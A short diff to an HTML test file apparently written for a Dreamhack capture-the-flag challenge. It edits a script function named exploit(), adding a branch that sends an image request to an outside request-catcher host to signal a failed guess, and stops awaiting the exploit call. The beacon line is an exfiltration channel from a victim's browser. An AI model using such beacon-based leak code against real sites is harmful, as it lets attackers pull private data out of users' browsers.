--- a/static/js/test.html
+++ b/static/js/test.html
@@ -39,8 +39,13 @@
                     break;
                 }
             }
+
+            if (!found) {
+                img.src = `https://xwdymwe.request.dreamhack.games/failed`;
+                break;
+            }
         }
     }
 
-    await exploit();
+    exploit();
 </script>
